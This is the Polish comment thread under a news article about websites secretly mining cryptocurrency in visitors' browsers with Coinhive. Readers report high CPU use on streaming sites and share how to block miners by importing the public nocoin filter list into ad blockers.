    Treść w internecie nie jest darmowa, a Polacy chyba o tym zapomnieli. Miejsce na serwerze, odnowienie domeny, tworzenie treści to są wszystko koszty, więc albo decydujesz się oglądać nachalne reklamy albo dzielisz się w jakimś procencie mocą procesora będąc na stronie. Nie ma nic za darmo.

    Odpowiedz
  • 2018.01.11 15:30 Łukasz

    Przepraszam za, być może, głupie pytanie, czy coin-hive.com to jedyna domena przy użyciu której ktoś może u nas kopać? Co stoi na przeszkodzie, by łobuzy zarejestrowały sobie inną?

    Odpowiedz
  • 2018.01.14 19:08 ja

    Na Pebx.pl nie zadziała podany w artykule filtr. Skrypt na ich stronie odnosi się do: https://coinhive.com/lib/coinhive.min.js
    W porównaniu do przykładu brak myślnika w nazwie przed domeną.

    Odpowiedz
  • 2018.01.16 12:47 Karol

    U mnie antywirus blokuje skrypty na ekinomaniak.tv

    Odpowiedz
  • 2018.01.17 23:22 Magda

    Z ciekawości wyłączyłam AdBlocka w Safari i kliknęłam w pierwszy lepszy link na iitv.pl – 380% CPU? To w ogóle możliwe?

    Odpowiedz
    • 2018.02.03 08:28 dawid

      a jak dziala safari z adblockiem (dodawalas te skrypty /filtry ktore doradzali w temacie i w komentarzach. bo u mnie an google chrome nic to nie dalo nawet z ublockiem i adblockiem, podejrzewam ze chroma ma takie dziury ze juz to siedzie gdzies na dysku,i zawirusowalo system i siedzie gdzies podpiete pod preces w services (poczatkowo obwinialem ze flash poległ z tym i przez niego mam te minery) ale teraz przesiadlem se na mozille z ublockiem i z dodanymi filtrami i jakos procesor w normie (ale jednak mozila jest toporna i zajume duuzo pamieci) mysle wlasnie nad safari bo z opera to jeszcze wieksze sito albo jakis pale moon albo (vivaldi)?

      Mam jednak wazne pytanie czy mzoe mi ktos wytlumaczyc jak odczytawac w chrome w MANADZERZE ZADAN te absurdalne iloosci wykoszytywania procesu siega tak jak mowisz do 380% czesto ale wlaczam task managera a takze proces explorer (polecam bo bardziej rozbudowany ale i tak kill procesow nie dziala lepiej niz w windowsowym) i tam procesy sa w normie raczej z tym ze bez adblocka wykorzystywanie procesora to caly czas 100% nie tylko na przegladarkach (dlatego podejrzewam ze juz miner zainfekowan mojego win7) z adblockiem i wyjatkami (tez origin ) przynajmniej procesor tak nie szaleje i jest ok 50% wykorzystanie

      Odpowiedz
  • 2018.03.29 13:18 fewfw

    Miner
    As you may have noticed we are testing a Monero javascript miner.

    This is only a test. We really want to get rid of all the ads. But we also need enough money to keep the site running.

    Let us know what you think in the comments. Do you want ads or do you want to give away a few of your CPU cycles every time you visit the site?

    Of course the mining can be blocked by a normal ad-blocker.

    Note :
    Initially there was a small typo so all CPU for a client was used. This should be corrected now so only 20-30% should be used.
    Also it is restricted to run in one tab only so even if you have 10 tabs oven it will only be running in 1.

    Odpowiedz
  • 2018.06.06 09:19 Astur

    U mnie zadziałało wprowadzenie linku
    https://raw.githubusercontent.com/hoshsadiq/adblock-nocoin-list/master/nocoin.txt
    w ustawieniach uBO, zakładka „Listy filtrów”, ostatnia pozycja – „Importuj”.
    Zaznaczasz tę pozycję, otwiera się okienko i wpisujesz tam podany link.
    Następnie klikasz przycisk „Zastosuj zmiany”
    I już.

    Odpowiedz
    • 2018.10.05 00:45 Gabriel

      Dziękuję! PS: W AdBlock Plus także zadziałał ten filtr

      Odpowiedz
  • 2022.03.04 02:10 Karina

    Strona desu-online.pl kopie kryptowaluty, nie polecam nawet na nią wchodzić. Na dodatek kradną odcinki innym znanym portalom.

    Odpowiedz

Zostaw odpowiedź do Karol

Jeśli chcesz zwrócić uwagę na literówkę lub inny błąd techniczny, zapraszamy do formularza kontaktowego. Reagujemy równie szybko.

Uważajcie, bo znane strony WWW kopią kryptowaluty na Waszych komputerach

Komentarze